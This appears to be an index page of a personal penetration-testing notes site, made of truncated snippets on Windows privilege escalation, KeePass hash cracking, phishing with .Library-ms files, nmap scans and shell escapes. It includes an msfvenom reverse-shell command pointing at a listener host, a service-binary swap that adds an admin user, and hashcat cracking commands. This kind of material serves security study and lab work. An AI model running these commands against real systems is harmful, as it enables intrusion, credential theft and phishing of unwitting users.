Compile it natively or not: x86_64-w64-mingw32-gcc searchedName.cpp --shared -o searchedName.dll Restart the service / application somehow and check if there is a new admin2 alive. Reflective DLL Injection See https://github.com/stephenfewer/ReflectiveDLLInjection
Binary hijacking Check if a binary (e.g. from a service) is writeable: PS C:\Users\dave> icacls "C:\xampp\apache\bin\httpd.exe"C:\xampp\apache\bin\httpd.exe BUILTIN\Administrators:(F) NT AUTHORITY\SYSTEM:(F) BUILTIN\Users:(F) NT AUTHORITY\Authenticated Users:(RX) Legend: If yes, replace it with a more useful executeable, like this one. Compile this for the correct target architecture and replace the original file. x86_64-w64-mingw32-gcc adduser.c -o adduser.exe Check this with one command:
Named pipes A named pipe is a method for remote or local IPC Inter-process communication. Basic commands Where is a program? where ssh Restart the system now: shutdown /r /t 0 Set file system attributes (which are shown with the dir command): attrib +r file.exe Set file system permissions (which are shown with the icacls command):…
The hash of a master password of a Keepass kdbx file can be extracted with keepass2john Database.kdbx > keepass.hash Then, crack it: /opt/hashcat/hashcat keepass.hash /opt/password_lists/rockyou.txt -m 13400 -r /opt/hashcat/rules/rockyou-30000.rule (!) If there is an error regarding salt, check if you have the username like “user:” at the beginning of the file. Remove it.
Short summary of techniques: Example of a manual In-memory injection Create a reverse shell payload for PowerShell: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.211 LPORT=443 -f powershell -v sc Use this PowerShell script, which injects the shellcode into the own (PowerShell) process and executes it in a new thread: Start a listener and execute it in the victim’s…
Get information from a (minified) JS (e.g. from Angular):
Files with the extension .Library-ms are similar to macOS’s Volumes. They can contain files and directory which looks like local files on the Windows Explorer. Many AV/Malware systems does not detect them currently. Create a Windows Library “Directory” Preparation: Install somewhere a DAV share which is available from the victim’s system which points to a…
Short: A user opens a link (e.g. from a phishing email) which has a injection in the URL which is then executed on the site as long as the user is logged in. See also command injections post. Classes: Tip:
See also the Web brute force post.
Nmap has it’s own scripting language with which complex or recurring tasks can be automatized. See the manpage. And share/nmap/scripts. Vulnerability scan # nmap -sV -T5 -F $victim --script vuln | tee nmap-vuln.txt Better vulnerability scans (thanks to this source) cd /usr/share/nmap/scripts/vulscan/utilities/updater/ && ./updateFiles.sh nmap --script nmap-vulners -sV -sC -p22 $victim nmap --script vulscan -sV…
Mandatory Optional Use this script to list all endpoints for further research:
high performance, open source universal RPC framework GRPC Client CLI Download the CLI via https://github.com/vadimi/grpc-client-cli. Then: ./grpc-client-cli $target:50051 GRPC Curl Download via https://github.com/fullstorydev/grpcurl. gRPC UI Download via https://github.com/fullstorydev/grpcui. Graphical command line interface. See also
Enumeration Mandatory Optional
Enumeration Mandatory Try to perform a zone transfer:dig axfr @10.10.11.166 trick.htb
(!) If upload does not seem to work, change the suffix e.g. from .php to .pHp. More: File uploads / images
Create file to execute code via meta data: https://github.com/convisolabs/CVE-2021–22204-exiftool
See https://www.infosecmatter.com/firebird-database-exploitation/
First, try to determine the shell echo $PATH echo $SHELL Try to set the PATH variable export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin Upload the escape_from_restricted_shell.c program (scripts directory). Have a look into a local bin directory and see if you can use any binary there to escape.
Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';